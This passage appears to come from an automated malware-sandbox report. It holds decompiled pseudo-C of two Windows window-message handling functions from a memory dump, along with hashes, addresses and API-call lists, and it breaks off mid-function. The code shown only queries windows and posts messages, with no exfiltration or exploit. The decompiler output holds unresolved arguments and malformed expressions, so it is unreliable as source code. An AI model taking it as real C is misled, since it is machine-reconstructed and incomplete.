                                          • Instruction ID: 235ca3140af89dde7aef2b5417356745ba7346731579a8a8404c51e55249dec7
                                          • Opcode Fuzzy Hash: 7e8f9e3fdc403fc15fd581c76d1a16a9ad3c1adb65e1c94705dd3fa945da94a0
                                          • Instruction Fuzzy Hash: 85A15E36701B419AFB54DF76E844BA937A1B788F98F5481259E0A53B28EF38C54EC708
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 31%
                                          			E00C809D4(void* __esi, void* __ebp, void* __eflags, signed long long __rax, signed long long __rbx, signed long long __rcx, signed long long __rdx, signed long long __r8, signed long long __r9) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				void* _t87;
                                          				signed int _t94;
                                          				long _t97;
                                          				long _t104;
                                          				signed int _t113;
                                          				signed int _t115;
                                          				long _t117;
                                          				signed short _t120;
                                          				signed int _t124;
                                          				signed short _t126;
                                          				signed short _t137;
                                          				void* _t138;
                                          				signed int _t139;
                                          				signed int _t142;
                                          				void* _t143;
                                          				void* _t181;
                                          				signed long long _t202;
                                          				signed long long _t204;
                                          				intOrPtr _t206;
                                          				signed long long _t214;
                                          				void* _t237;
                                          				void* _t249;
                                          				signed long long _t250;
                                          				signed long long _t255;
                                          				signed long long _t256;
                                          				signed long long _t261;
                                          				signed long long _t264;
                                          				void* _t267;
                                          				void* _t269;
                                          				void* _t270;
                                          				signed long long _t272;
                                          				signed long long _t277;
                                          				signed long long _t285;
                                          				signed long long _t288;
                                          				signed long long _t289;
                                          				void* _t291;
                                          				struct HWND__* _t294;
                                          				void* _t295;
                                          				intOrPtr _t296;
                                          
                                          				_t277 = __r9;
                                          				_t272 = __r8;
                                          				_t204 = __rbx;
                                          				_t202 = __rax;
                                          				 *((long long*)(_t269 + 0x10)) = __rbx;
                                          				 *((long long*)(_t269 + 0x20)) = __r9;
                                          				_t267 = _t269 - 7;
                                          				_t270 = _t269 - 0xd0;
                                          				_t261 = __rdx;
                                          				_t264 = __rcx;
                                          				_t285 = __r8;
                                          				GetAncestor(_t294);
                                          				_t295 = __rcx + 0x88;
                                          				 *(_t267 + 0x47) = __rax;
                                          				E00C7BA38(__eflags, __rax, __rbx, _t295, __rax, __rcx, __r8, __r9, _t291);
                                          				r14d = 0;
                                          				_t288 = _t202;
                                          				_t87 = E00C7BF60(_t202, __rdx);
                                          				_t6 = _t204 + 1; // 0x1
                                          				_t142 = _t6;
                                          				if(_t87 != 0) {
                                          					 *(_t267 + 0x47) = _t261;
                                          					r14d = _t142;
                                          				}
                                          				_t137 =  *(_t267 + 0x6f);
                                          				_t143 = 0x49;
                                          				_t88 = _t204 - 0x201;
                                          				_t181 = _t204 - 0x201 - 6;
                                          				if(_t181 > 0) {
                                          					L33:
                                          					_t289 =  *(_t267 + 0x47);
                                          					L34:
                                          					E00C7B6C4(_t204, _t264, _t261, _t264);
                                          					r8d = 0x80;
                                          					_t249 = _t267 - 0x79;
                                          					GetClassNameA(??, ??, ??);
                                          					r12d =  *(_t267 + 0x67) & 0x0000ffff;
                                          					_t273 = _t261;
                                          					r9d = _t137 & 0x0000ffff;
                                          					PostMessageA(??, ??, ??, ??);
                                          					_t214 = _t264;
                                          					if( *(_t267 + 0x67) != 1) {
                                          						_t296 =  *((intOrPtr*)(_t267 + 0x87));
                                          						_t250 = _t261;
                                          						r8d =  *(_t267 + 0x77);
                                          						_t280 = _t296;
                                          						_t138 = E00C78DE0(_t204, _t214, _t250, _t264, _t267, _t296);
                                          						_t149 = 0xffff;
                                          						_t94 =  *(_t267 + 0x67) & 0x0000ffff;
                                          						__eflags = _t94 - 8;
                                          						if(__eflags > 0) {
                                          							__eflags = _t94 - 9;
                                          							if(__eflags == 0) {
                                          								__eflags = _t138 - 0xa2;
                                          								if(_t138 != 0xa2) {
                                          									__eflags = _t138 - 0xa5;
                                          									if(_t138 != 0xa5) {
                                          										L71:
                                          										__eflags =  *(_t267 + 0x6f) + 0xfffffdff - 6;
                                          										if(__eflags <= 0) {
                                          											asm("bt ecx, eax");
                                          											if(__eflags < 0) {
                                          												E00C7C170(__eflags, _t202, _t204, _t264, _t289, _t264, _t267, _t273, _t280);
                                          											}
                                          										}
                                          										L74:
                                          										_t97 = E00C7B908(_t264);
                                          										L75:
                                          										return _t97;
                                          									}
                                          									_t139 = 0xffff;
                                          									__eflags = r14d;
                                          									if(r14d != 0) {
                                          										L68:
                                          										_t273 = _t261;
                                          										L69:
                                          										_t280 = _t296;
                                          										L70:
                                          										PostMessageA();
                                          										goto L71;
                                          									}
                                          									L107:
                                          									GetAncestor();
                                          									_t261 = _t202;
                                          									_t149 = 0xffff;
                                          									L56:
                                          									__eflags = _t139;
                                          									if(_t139 == 0) {
                                          										goto L71;
                                          									}
                                          									__eflags = _t139 - _t149;
                                          									if(_t139 == _t149) {
                                          										goto L68;
                                          									}
                                          									L58:
                                          									r8d = _t139 & 0x0000ffff;
                                          									goto L69;
                                          								}
                                          								_t202 =  *((intOrPtr*)(_t267 + 0x5f));
                                          								asm("sbb cx, cx");
                                          								_t139 = _t214 + 0xf030;
                                          								__eflags = r14d;
                                          								if(r14d != 0) {
                                          									goto L56;
                                          								}
                                          								goto L107;
                                          							}
                                          							if(__eflags <= 0) {
                                          								L45:
                                          								_t273 = _t285;
                                          								goto L69;
                                          							}
                                          							__eflags = _t94 - 0x11;
                                          							if(_t94 <= 0x11) {
                                          								__eflags = r14d;
                                          								if(r14d == 0) {
                                          									GetAncestor();
                                          									_t261 = _t202;
                                          								}
                                          								__eflags = _t138 - 0xa1;
                                          								if(__eflags == 0) {
                                          									L79:
                                          									_t104 = GetWindowThreadProcessId();
                                          									r9d =  *(_t267 + 0x67) & 0x0000ffff;
                                          									_t273 = _t261;
                                          									 *(_t270 + 0x20) = 1;
                                          									E00C78CFC(_t104, __eflags, _t202, _t204, _t264, _t267, _t261);
                                          								}
                                          								goto L71;
                                          							}
                                          							__eflags = _t94 - 0x14;
                                          							if(_t94 == 0x14) {
                                          								__eflags = _t138 - 0xa2;
                                          								if(_t138 != 0xa2) {
                                          									L84:
                                          									__eflags = _t138 - 0xa5;
                                          									if(_t138 != 0xa5) {
                                          										goto L71;
                                          									}
                                          									L85:
                                          									__eflags = r14d;
                                          									if(r14d != 0) {
                                          										goto L68;
                                          									}
                                          									L67:
                                          									GetAncestor();
                                          									_t261 = _t202;
                                          									goto L68;
                                          								}
                                          								_t139 = 0xf060;
                                          								L82:
                                          								__eflags = r14d;
                                          								if(r14d == 0) {
                                          									GetAncestor();
                                          									_t261 = _t202;
                                          								}
                                          								goto L58;
                                          							}
                                          							__eflags = _t94 - 0x15;
                                          							if(_t94 != 0x15) {
                                          								goto L45;
                                          							}
                                          							__eflags = _t138 - 0xa2;
                                          							if(_t138 != 0xa2) {
                                          								__eflags = _t138 - 0xa5;
                                          								if(_t138 == 0xa5) {
                                          									goto L85;
                                          								}
                                          								__eflags = _t138 - 0xa1;
                                          								if(_t138 != 0xa1) {
                                          									goto L71;
                                          								}
                                          								__eflags = r14d;
                                          								if(r14d != 0) {
                                          									goto L45;
                                          								}
                                          								L98:
                                          								GetAncestor();
                                          								_t261 = _t202;
                                          								goto L45;
                                          							}
                                          							_t139 = 0xf180;
                                          							goto L82;
                                          						}
                                          						if(__eflags == 0) {
                                          							__eflags = _t138 - 0xa2;
                                          							if(_t138 != 0xa2) {
                                          								goto L84;
                                          							}
                                          							_t139 = 0xf020;
                                          							goto L82;
                                          						}
                                          						__eflags = _t94 - 2;
                                          						if(_t94 == 2) {
                                          							L61:
                                          							__eflags = _t138 - 0xa3;
                                          							if(_t138 != 0xa3) {
                                          								__eflags = _t138 - 0xa5;
                                          								if(_t138 != 0xa5) {
                                          									__eflags = _t138 - 0xa1;
                                          									if(_t138 != 0xa1) {
                                          										goto L71;
                                          									}
                                          									__eflags = r14d;
                                          									if(__eflags == 0) {
                                          										GetAncestor();
                                          										_t261 = _t202;
                                          									}
                                          									goto L79;
                                          								}
                                          								__eflags = r14d;
                                          								if(r14d != 0) {
                                          									goto L68;
                                          								}
                                          								goto L67;
                                          							}
                                          							__eflags = r14d;
                                          							if(r14d != 0) {
                                          								goto L45;
                                          							}
                                          							goto L98;
                                          						}
                                          						__eflags = _t94 - 3;
                                          						if(_t94 == 3) {
                                          							__eflags = _t138 - 0xa3;
                                          							if(_t138 != 0xa3) {
                                          								__eflags = _t138 - 0xa5;
                                          								if(_t138 != 0xa5) {
                                          									goto L71;
                                          								}
                                          								_t139 = 0xffff;
                                          								goto L56;
                                          							}
                                          							GetSystemMenu();
                                          							__eflags = _t202;
                                          							if(_t202 == 0) {
                                          								goto L71;
                                          							}
                                          							_t67 = _t250 + 2; // 0x2
                                          							r8d = _t67;
                                          							_t113 = GetMenuDefaultItem(??, ??, ??);
                                          							_t280 = _t267 - 0x79;
                                          							 *((intOrPtr*)(_t267 - 0x79)) = 0x50;
                                          							_t139 = _t113;
                                          							r8d = 0;
                                          							 *(_t267 - 0x75) = 1;
                                          							_t115 = GetMenuItemInfoA(??, ??, ??, ??);
                                          							r12d = 0;
                                          							_t149 = 0xffff;
                                          							__eflags = _t115;
                                          							if(_t115 != 0) {
                                          								__eflags =  *(_t267 - 0x6d) & 0x00000003;
                                          								if(( *(_t267 - 0x6d) & 0x00000003) != 0) {
                                          									_t139 = r12w & 0xffffffff;
                                          								}
                                          							}
                                          							goto L56;
                                          						}
                                          						__eflags = _t94 - 5;
                                          						if(_t94 == 5) {
                                          							__eflags = _t138 - 0xa1;
                                          							if(_t138 != 0xa1) {
                                          								__eflags = _t138 - 0xa0;
                                          								if(_t138 != 0xa0) {
                                          									goto L61;
                                          								}
                                          								_t273 = _t214;
                                          								L48:
                                          								_t202 =  *((intOrPtr*)(_t264 + 0x38));
                                          								r9d = 0;
                                          								goto L70;
                                          							}
                                          							r8d = 1;
                                          							goto L48;
                                          						}
                                          						_t63 = _t214 - 1; // 0x1
                                          						r14d = _t63;
                                          						__eflags = _t94 + 0xfffffffa - r14d;
                                          						if(_t94 + 0xfffffffa > r14d) {
                                          							goto L45;
                                          						}
                                          						__eflags = _t138 - 0xa5;
                                          						if(_t138 == 0xa5) {
                                          							goto L68;
                                          						}
                                          						__eflags = _t138 - 0xa1;
                                          						if(_t138 == 0xa1) {
                                          							_t117 = GetWindowThreadProcessId();
                                          							 *(_t270 + 0x20) = r14d;
                                          							__eflags = 0;
                                          							r9d = 0;
                                          							E00C78CFC(_t117, 0, _t202, _t204, _t264, _t267, _t261);
                                          						}
                                          						goto L45;
                                          					}
                                          					r8d = 0;
                                          					_t120 = E00C81978(_t143, 0, _t202, _t214, _t249);
                                          					r8d =  *(_t267 + 0x6f);
                                          					E00C78DE0(_t204, _t264, _t261, _t264, _t267,  *((intOrPtr*)(_t267 + 0x87)));
                                          					r8d = _t120 & 0x0000ffff;
                                          					PostMessageA(??, ??, ??, ??);
                                          					goto L74;
                                          				}
                                          				asm("bt ecx, eax");
                                          				if(_t181 >= 0) {
                                          					goto L33;
                                          				} else {
                                          					_t202 =  *((intOrPtr*)(_t264 + 0x38));
                                          					 *(_t270 + 0x40) = _t204;
                                          					 *(_t202 + 0x168) = 0;
                                          					if(_t261 ==  *((intOrPtr*)(_t264 + 0x138)) || _t261 ==  *((intOrPtr*)(_t264 + 0x148)) || _t261 ==  *((intOrPtr*)(_t264 + 0x140))) {
                                          						_t202 =  *((intOrPtr*)(_t264 + 0x38));
                                          						_t277 =  *((intOrPtr*)(_t267 + 0x7f));
                                          						r8d = 9;
                                          						 *(_t270 + 0x30) = _t270 + 0x48;
                                          						 *((intOrPtr*)(_t270 + 0x28)) = 0x3e8;
                                          						 *(_t270 + 0x20) = 2;
                                          						_t88 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          						if(_t202 != 0) {
                                          							_t202 =  *((intOrPtr*)(_t264 + 0x38));
                                          							r8d = 1;
                                          							 *(_t202 + 0x168) = r8d;
                                          						}
                                          					}
                                          					if(E00C7BFC8(_t88, _t204, _t295, _t261) == 0) {
                                          						_t255 =  *(_t267 + 0x47);
                                          						_t124 = E00C7BFC8(_t123, _t204, _t295, _t255);
                                          						_t143 = 0;
                                          						__eflags = _t124;
                                          						_t256 =  !=  ?  *(_t267 + 0x47) : _t255;
                                          					} else {
                                          						_t256 = _t261;
                                          					}
                                          					_t237 = _t295;
                                          					E00C7B7B0(_t204, _t237, _t256, _t261, _t264, _t267, _t272, _t277);
                                          					_t126 =  *(_t267 + 0x6f);
                                          					if(_t126 != 0x201) {
                                          						__eflags = _t126 - 0x204;
                                          						_t143 = 0xb;
                                          						_t272 =  ==  ? _t237 : _t204;
                                          					} else {
                                          						r8d = 0xa;
                                          					}
                                          					if(_t261 ==  *((intOrPtr*)(_t264 + 0x100)) && _t272 != 0) {
                                          						_t202 =  *((intOrPtr*)(_t264 + 0x38));
                                          						_t277 =  *((intOrPtr*)(_t267 + 0x7f));
                                          						PostMessageA(??, ??, ??, ??);
                                          					}
                                          					_t206 =  *((intOrPtr*)(_t264 + 0x248));
                                          					if(E00C6ADD8() <= 5 || _t206 !=  *((intOrPtr*)(_t264 + 0xe8)) && _t206 !=  *((intOrPtr*)(_t264 + 0xc8))) {
                                          						E00C7F480(_t206, _t264);
                                          						_t204 = _t202;
                                          					}
                                          					if(_t285 == _t204 || (E00C7BB64(_t202, _t204, _t295, _t285, _t277) & 0x00000010) != 0) {
                                          						L32:
                                          						_t137 =  *(_t267 + 0x6f);
                                          						goto L33;
                                          					} else {
                                          						if(_t288 != 0) {
                                          							_t261 = _t288;
                                          							GetAncestor(??, ??);
                                          							_t285 = _t202;
                                          						}
                                          						GetWindow();
                                          						if(_t285 != _t202) {
                                          							L29:
                                          							E00C7C170(_t198, _t202, _t204, _t264, _t285, _t264, _t267, _t272, _t277);
                                          							_t137 =  *(_t267 + 0x6f);
                                          							_t289 =  *(_t267 + 0x47);
                                          							r9d = _t137 & 0x0000ffff;
                                          							_t277 = _t277 << 0x00000010 | _t202;
                                          							_t202 = _t270 + 0x40;
                                          							 *(_t270 + 0x30) = _t202;
                                          							 *((intOrPtr*)(_t270 + 0x28)) = 0x64;
                                          							 *(_t270 + 0x20) = 2;
                                          							_t97 = SendMessageTimeoutA(??, ??, ??, ??, ??, ??, ??);
                                          							if(_t202 == 0) {
                                          								goto L34;
                                          							}
                                          							_t202 =  *(_t270 + 0x40) + 0xfffffffe;
                                          							if((_t202 & 0xfffffffd) == 0) {
                                          								goto L75;
                                          							}
                                          							goto L34;
                                          						} else {
                                          							 *((intOrPtr*)(_t267 - 0x79)) = 0x3c;
                                          							if(GetWindowInfo(??, ??) == 0) {
                                          								goto L29;
                                          							}
                                          							_t198 =  *(_t267 - 0x51) & 0x00000080;
                                          							if(( *(_t267 - 0x51) & 0x00000080) != 0) {
                                          								goto L32;
                                          							}
                                          							goto L29;
                                          						}
                                          					}
                                          				}
                                          			}
                                          0x00c80ecb
                                          0x00c80e51
                                          0x00c80e54
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c80e56
                                          0x00c80e39
                                          0x00c80e3c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c80e42
                                          0x00c80d1b
                                          0x00c80d1e
                                          0x00c80da7
                                          0x00c80dad
                                          0x00c80e24
                                          0x00c80e2a
                                          0x00000000
                                          0x00000000
                                          0x00c80e2c
                                          0x00000000
                                          0x00c80e2c
                                          0x00c80db4
                                          0x00c80dbd
                                          0x00c80dc0
                                          0x00000000
                                          0x00000000
                                          0x00c80dcb
                                          0x00c80dcb
                                          0x00c80dcf
                                          0x00c80dd5
                                          0x00c80dd9
                                          0x00c80de0
                                          0x00c80de2
                                          0x00c80df0
                                          0x00c80df3
                                          0x00c80df9
                                          0x00c80dfc
                                          0x00c80e01
                                          0x00c80e03
                                          0x00c80e05
                                          0x00c80e09
                                          0x00c80e0b
                                          0x00c80e0b
                                          0x00c80e09
                                          0x00000000
                                          0x00c80e03
                                          0x00c80d24
                                          0x00c80d27
                                          0x00c80d76
                                          0x00c80d7c
                                          0x00c80d96
                                          0x00c80d9c
                                          0x00000000
                                          0x00000000
                                          0x00c80da2
                                          0x00c80d84
                                          0x00c80d84
                                          0x00c80d88
                                          0x00000000
                                          0x00c80d8b
                                          0x00c80d7e
                                          0x00000000
                                          0x00c80d7e
                                          0x00c80d2c
                                          0x00c80d2c
                                          0x00c80d30
                                          0x00c80d33
                                          0x00000000
                                          0x00000000
                                          0x00c80d35
                                          0x00c80d3b
                                          0x00000000
                                          0x00000000
                                          0x00c80d41
                                          0x00c80d47
                                          0x00c80d4e
                                          0x00c80d57
                                          0x00c80d61
                                          0x00c80d63
                                          0x00c80d67
                                          0x00c80d67
                                          0x00000000
                                          0x00c80d47
                                          0x00c80ca4
                                          0x00c80ca9
                                          0x00c80cb8
                                          0x00c80cc2
                                          0x00c80ccd
                                          0x00c80cd3
                                          0x00000000
                                          0x00c80cd3
                                          0x00c80a57
                                          0x00c80a5a
                                          0x00000000
                                          0x00c80a60
                                          0x00c80a60
                                          0x00c80a66
                                          0x00c80a6b
                                          0x00c80a78
                                          0x00c80a8c
                                          0x00c80a95
                                          0x00c80a99
                                          0x00c80a9f
                                          0x00c80aa7
                                          0x00c80ab5
                                          0x00c80abd
                                          0x00c80ac6
                                          0x00c80ac8
                                          0x00c80acc
                                          0x00c80ad2
                                          0x00c80ad2
                                          0x00c80ac6
                                          0x00c80ae6
                                          0x00c80aed
                                          0x00c80af4
                                          0x00c80af9
                                          0x00c80afb
                                          0x00c80aff
                                          0x00c80ae8
                                          0x00c80ae8
                                          0x00c80ae8
                                          0x00c80b04
                                          0x00c80b07
                                          0x00c80b0c
                                          0x00c80b14
                                          0x00c80b1e
                                          0x00c80b26
                                          0x00c80b2b
                                          0x00c80b16
                                          0x00c80b16
                                          0x00c80b16
                                          0x00c80b39
                                          0x00c80b40
                                          0x00c80b44
                                          0x00c80b4e
                                          0x00c80b4e
                                          0x00c80b54
                                          0x00c80b63
                                          0x00c80b7a
                                          0x00c80b7f
                                          0x00c80b7f
                                          0x00c80b85
                                          0x00c80c50
                                          0x00c80c50
                                          0x00000000
                                          0x00c80b9e
                                          0x00c80ba1
                                          0x00c80bab
                                          0x00c80bae
                                          0x00c80bb4
                                          0x00c80bb4
                                          0x00c80bbf
                                          0x00c80bc8
                                          0x00c80be8
                                          0x00c80bee
                                          0x00c80bfc
                                          0x00c80c02
                                          0x00c80c06
                                          0x00c80c11
                                          0x00c80c14
                                          0x00c80c19
                                          0x00c80c1e
                                          0x00c80c26
                                          0x00c80c2e
                                          0x00c80c37
                                          0x00000000
                                          0x00000000
                                          0x00c80c3e
                                          0x00c80c48
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c80bca
                                          0x00c80bce
                                          0x00c80be0
                                          0x00000000
                                          0x00000000
                                          0x00c80be2
                                          0x00c80be6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00c80be6
                                          0x00c80bc8
                                          0x00c80b85

                                          APIs
                                          • GetAncestor.USER32 ref: 00C80A06
                                            • Part of subcall function 00C7BA38: GetWindowLongPtrA.USER32 ref: 00C7BA6C
                                            • Part of subcall function 00C7BA38: GetLastActivePopup.USER32 ref: 00C7BA80
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BA9D
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAAB
                                            • Part of subcall function 00C7BA38: GetWindowInfo.USER32 ref: 00C7BAC4
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BAD2
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB1B
                                            • Part of subcall function 00C7BA38: GetWindow.USER32 ref: 00C7BB2F
                                            • Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BF74
                                            • Part of subcall function 00C7BF60: GetClassNameA.USER32 ref: 00C7BF88
                                            • Part of subcall function 00C7BF60: lstrcmpiA.KERNEL32 ref: 00C7BF9A
                                            • Part of subcall function 00C7BF60: GetParent.USER32 ref: 00C7BFA7
                                          • SendMessageTimeoutA.USER32 ref: 00C80ABD
                                          • PostMessageA.USER32 ref: 00C80B4E
                                          • GetAncestor.USER32 ref: 00C80BAE
                                          • GetWindow.USER32 ref: 00C80BBF
                                          • GetWindowInfo.USER32 ref: 00C80BD8
                                            • Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFE0
                                            • Part of subcall function 00C7BFC8: GetWindowLongPtrA.USER32 ref: 00C7BFF2
                                          • SendMessageTimeoutA.USER32 ref: 00C80C2E
                                          • GetClassNameA.USER32 ref: 00C80C6F
                                          • PostMessageA.USER32 ref: 00C80C90
                                          • PostMessageA.USER32 ref: 00C80CD3
                                          • GetWindowThreadProcessId.USER32 ref: 00C80D4E
                                            • Part of subcall function 00C78CFC: PostMessageA.USER32 ref: 00C78D9B
                                          • GetSystemMenu.USER32 ref: 00C80DB4
                                          • GetMenuDefaultItem.USER32 ref: 00C80DCF
                                          • GetMenuItemInfoA.USER32 ref: 00C80DF3
                                          • GetAncestor.USER32 ref: 00C80E5B
                                          • PostMessageA.USER32 ref: 00C80E72
                                          • GetAncestor.USER32 ref: 00C80ED2
                                          • GetWindowThreadProcessId.USER32 ref: 00C80EE0
                                          • GetAncestor.USER32 ref: 00C80F23
                                          • GetAncestor.USER32 ref: 00C80FA4
                                          • GetAncestor.USER32 ref: 00C80FD4
                                            • Part of subcall function 00C78DE0: GetTickCount.KERNEL32 ref: 00C78E70
                                            • Part of subcall function 00C78DE0: GetClassLongPtrA.USER32 ref: 00C78EC0
                                          • GetAncestor.USER32 ref: 00C81023
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.938116382.0000000000C61000.00000020.00020000.sdmp, Offset: 00C60000, based on PE: true
                                          • Associated: 00000005.00000002.938071234.0000000000C60000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp
                                          • Associated: 00000005.00000002.938397557.0000000000C90000.00000004.00020000.sdmp
                                          • Associated: 00000005.00000002.938493142.0000000000C97000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Ancestor$Message$Post$Long$ClassInfoMenu$ItemNameParentProcessSendThreadTimeout$ActiveCountDefaultLastPopupSystemTicklstrcmpi
                                          • String ID: d
                                          • API String ID: 1640956133-2564639436
                                          • Opcode ID: 4e5675ef67dbeac10279ccebe900f7c3db1b69a0ab720fb5d7527fa625c51dbf
                                          • Instruction ID: 7e920b3072e74291e276bce137d6dc37fb08b91ebe010460099f131b8a9cd516
                                          • Opcode Fuzzy Hash: 4e5675ef67dbeac10279ccebe900f7c3db1b69a0ab720fb5d7527fa625c51dbf
                                          • Instruction Fuzzy Hash: EFE1353230074086EBB4AF62D9807BE6351FB45BDCF708525EEAA47B95DF38D9498309
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E00C78F34(void* __esi, signed long long __rax, long long __rbx, void* __rcx, signed long long __rdx, signed long long __r8, signed long long __r9) {
                                          				void* __rdi;
                                          				void* __rsi;
                                          				void* __rbp;
                                          				void* _t80;
                                          				long _t82;
                                          				long _t88;
                                          				int _t94;
                                          				long _t97;
                                          				signed short _t100;
                                          				signed int _t103;
                                          				void* _t119;
                                          				signed short _t120;
                                          				signed int _t122;
                                          				signed int _t157;
                                          				signed int _t158;
                                          				void* _t159;
                                          				void* _t161;
                                          				signed long long _t186;
                                          				signed long long _t190;
                                          				signed long long _t192;
                                          				void* _t198;
                                          				signed long long _t234;
                                          				signed long long _t237;
                                          				void* _t240;
                                          				void* _t243;
                                          				void* _t245;
                                          				void* _t246;
                                          				signed long long _t248;
                                          				signed long long _t256;
                                          				void* _t265;
                                          				void* _t267;
                                          				void* _t269;
                                          				signed long long _t270;
                                          				struct HWND__* _t273;
                                          
                                          				_t256 = __r9;
                                          				_t248 = __r8;
                                          				_t186 = __rax;
                                          				 *((long long*)(_t245 + 0x10)) = __rbx;
                                          				 *((long long*)(_t245 + 0x20)) = __r9;
                                          				_push(_t243);
                                          				_push(_t265);
                                          				_push(_t267);
                                          				_t246 = _t245 - 0xb0;
                                          				_t237 = __rdx;
                                          				_t240 = __rcx;
                                          				_t270 = __r8;
                                          				GetAncestor(_t273);
                                          				_t274 = __rcx + 0x88;
                                          				 *(_t246 + 0xf0) = __rax;
                                          				_t230 = __rax;
                                          				_t190 = __rax;
                                          				E00C7BA38(_t159, __rax, __rax, __rcx + 0x88, __rax, __rcx, __r8, __r9, _t269);
                                          				r12d = 0;
                                          				 *(_t246 + 0x40) = _t186;
                                          				_t157 = r12d;
                                          				_t80 = E00C7BF60(_t186, __rdx);
                                          				_t6 = _t265 + 1; // 0x1
                                          				_t122 = _t6;
                                          				if(_t80 != 0) {
                                          					_t190 = _t237;
                                          					_t157 = _t122;
                                          					 *(_t246 + 0xf0) = _t190;
                                          				}
                                          				r13d =  *(_t246 + 0x118);
                                          				r12d =  *(_t246 + 0x110) & 0x0000ffff;
                                          				_t81 = _t267 - 0x201;
                                          				_t161 = _t267 - 0x201 - 6;
                                          				if(_t161 > 0) {
                                          					L36:
                                          					_t82 = 0;
                                          					if( *(_t246 + 0x40) != _t186) {
                                          						L74:
                                          						return _t82;
                                          					}
                                          					r9d = r13w & 0xffffffff;
                                          					r15d = r12w & 0xffffffff;
                                          					PostMessageA(??, ??, ??, ??);
                                          					_t198 = _t240;
                                          					if(r12w != 1) {
                                          						r8d =  *(_t246 + 0x120);
                                          						_t119 = E00C78DE0(_t190, _t198, _t237, _t240, _t243,  *((intOrPtr*)(_t246 + 0x130)));
                                          						_t123 = 0xffff;
                                          						_t82 = r12w & 0xffffffff;
                                          						__eflags = _t82 - 8;
                                          						if(__eflags > 0) {
                                          							__eflags = _t82 - 9;
                                          							if(__eflags == 0) {
                                          								__eflags = _t119 - 0xa2;
                                          								if(_t119 != 0xa2) {
                                          									__eflags = _t119 - 0xa5;
                                          									if(_t119 != 0xa5) {
                                          										goto L74;
                                          									}
                                          									_t120 = 0xffff;
                                          									__eflags = _t157;
                                          									if(_t157 != 0) {
                                          										L71:
                                          										L72:
                                          										L73:
                                          										_t82 = PostMessageA();
                                          										goto L74;
                                          									}
                                          									L106:
                                          									_t82 = GetAncestor();
                                          									_t237 = _t186;
                                          									L107:
                                          									_t123 = 0xffff;
                                          									L59:
                                          									__eflags = _t120;
                                          									if(_t120 == 0) {
                                          										goto L74;
                                          									}
                                          									__eflags = _t120 - _t123;
                                          									if(_t120 == _t123) {
                                          										goto L71;
                                          									}
                                          									L61:
                                          									r8d = _t120 & 0x0000ffff;
                                          									goto L72;
                                          								}
                                          								_t186 =  *((intOrPtr*)(_t246 + 0x108));
                                          								_t82 =  ~( *(_t186 + 0x24) & 0x01000000);
                                          								asm("sbb cx, cx");
                                          								_t77 = _t198 + 0xf030; // 0x1f02f
                                          								_t120 = _t77;
                                          								__eflags = _t157;
                                          								if(_t157 != 0) {
                                          									goto L107;
                                          								}
                                          								goto L106;
                                          							}
                                          							if(__eflags <= 0) {
                                          								L48:
                                          								goto L72;
                                          							}
                                          							__eflags = _t82 - 0x11;
                                          							if(_t82 <= 0x11) {
                                          								__eflags = _t157;
                                          								if(_t157 == 0) {
                                          									_t82 = GetAncestor();
                                          									_t237 = _t186;
                                          								}
                                          								__eflags = _t119 - 0xa1;
                                          								if(__eflags == 0) {
                                          									L78:
                                          									_t88 = GetWindowThreadProcessId();
                                          									r9d = r12w & 0xffffffff;
                                          									 *(_t246 + 0x20) = 1;
                                          									_t82 = E00C78CFC(_t88, __eflags, _t186, _t190, _t240, _t243, _t237);
                                          								}
                                          								goto L74;
                                          							}
                                          							__eflags = _t82 - 0x14;
                                          							if(_t82 == 0x14) {
                                          								__eflags = _t119 - 0xa2;
                                          								if(_t119 != 0xa2) {
                                          									L83:
                                          									__eflags = _t119 - 0xa5;
                                          									if(_t119 != 0xa5) {
                                          										goto L74;
                                          									}
                                          									L84:
                                          									__eflags = _t157;
                                          									if(_t157 != 0) {
                                          										goto L71;
                                          									}
                                          									L70:
                                          									GetAncestor();
                                          									_t237 = _t186;
                                          									goto L71;
                                          								}
                                          								_t120 = 0xf060;
                                          								L81:
                                          								__eflags = _t157;
                                          								if(_t157 == 0) {
                                          									GetAncestor();
                                          									_t237 = _t186;
                                          								}
                                          								goto L61;
                                          							}
                                          							__eflags = _t82 - 0x15;
                                          							if(_t82 != 0x15) {
                                          								goto L48;
                                          							}
                                          							__eflags = _t119 - 0xa2;
                                          							if(_t119 != 0xa2) {
                                          								__eflags = _t119 - 0xa5;
                                          								if(_t119 == 0xa5) {
                                          									goto L84;
                                          								}
                                          								__eflags = _t119 - 0xa1;
                                          								if(_t119 != 0xa1) {
                                          									goto L74;
                                          								}
                                          								__eflags = _t157;
                                          								if(_t157 != 0) {
                                          									goto L48;
                                          								}
                                          								L97:
                                          								GetAncestor();
                                          								_t237 = _t186;
                                          								goto L48;
                                          							}
                                          							_t120 = 0xf180;
                                          							goto L81;
                                          						}
                                          						if(__eflags == 0) {
                                          							__eflags = _t119 - 0xa2;
                                          							if(_t119 != 0xa2) {
                                          								goto L83;
                                          							}
                                          							_t120 = 0xf020;
                                          							goto L81;
                                          						}
                                          						r13d = 2;
                                          						__eflags = _t82 - r13d;
                                          						if(_t82 == r13d) {
                                          							L64:
                                          							__eflags = _t119 - 0xa3;
                                          							if(_t119 != 0xa3) {
                                          								__eflags = _t119 - 0xa5;
                                          								if(_t119 != 0xa5) {
                                          									__eflags = _t119 - 0xa1;
                                          									if(_t119 != 0xa1) {
                                          										goto L74;
                                          									}
                                          									__eflags = _t157;
                                          									if(__eflags == 0) {
